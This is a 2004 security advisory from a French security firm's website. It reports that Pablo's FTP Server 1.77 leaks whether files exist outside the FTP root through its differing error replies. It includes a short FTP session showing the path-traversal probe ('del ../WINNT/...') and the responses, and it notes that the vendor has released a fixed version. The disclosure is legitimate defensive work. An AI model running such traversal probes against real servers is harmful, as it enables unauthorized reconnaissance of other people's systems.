Entreprise d'experts en Sécurité Informatique : Audits et conseils en cybersécurité
Entreprise française de cybersécurité depuis 2004
☎ 03 60 47 09 81 - info@securiteinfo.com

Pablo Software Solutions FTP server can detect if a file exists outside the FTP root directory


CONTOURNEMENT DES SÉCURITÉS DÉTOURNEMENT DE SERVEUR FUITE D'INFORMATIONS TECHNOLOGIES WEB

Overview


Pablo Software Solutions FTP server version 1.77 can detect if a file exists outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions

Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It comes with an easy to use interface and can be accessed from the system tray. The server handles all basic FTP commands and offers easy user account management and support for virtual directories. This FTP server can detect if a file exists outside the FTP root directory.

Risk


Exploit easiness etoile1etoile1etoile1etoile1etoile1
Vulnerability spreading etoile1etoile1etoile0etoile0etoile0
Impact etoile1etoile0etoile0etoile0etoile0
Risk etoile1etoile1etoile0etoile0etoile0

Details


The vulnerability can be done using the MS-DOS ftp client. When you are logged on the server, you can send a del \..\<filename> supposed your root directory is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If <filename> doesn't exist, the FTP server answers "550 File not found."

Exploit


Checking if a file exists on a remote system can be usefull to :

Here is an example of the vulnerability :

C:\>ftp 127.0.0.1
Connecté à 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
-rwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets reçus dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit

Solution


The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 or superior.

Discovered by


Arnaud Jacques aka scrap
webmaster@securiteinfo.com

Tags


CONTOURNEMENT DES SÉCURITÉS DÉTOURNEMENT DE SERVEUR FUITE D'INFORMATIONS TECHNOLOGIES WEB


Inscription à notre lettre d'information


Inscrivez-vous à notre lettre d'information pour vous tenir au courant de nos actualités et de nos dernières trouvailles.


SecuriteInfo.com est une entreprise française de cybersécurité. Nous proposons différentes solutions matérielles et prestations de services permettant de sécuriser les données des Systèmes d'Information d'entreprises ou de collectivités. Notre périmètre d'intervention couvre l'intégralité de votre système d'information : Sécurité périmétrique, réseaux, accès distants, VPN, solutions anti-spam et anti-malwares, différents audits réseaux et systèmes, vérification de la politique de sécurité, hébergement sécurisé ...
Facebook SecuriteInfo.com
Twitter de SecuriteInfo.com
Github de SecuriteInfo.com
Calculs scientifiques distribués contre les maladies, équipe SecuriteInfo.com
Depuis 2015, SecuriteInfo.com soumet et analyse des malwaressur VirusTotal
Depuis 2020, SecuriteInfo.com participe à la lutte antivirale avec nos amis suisses de Malware Baazar (Abuse.ch)
© 2000-2026 - Tous droits réservés SecuriteInfo.com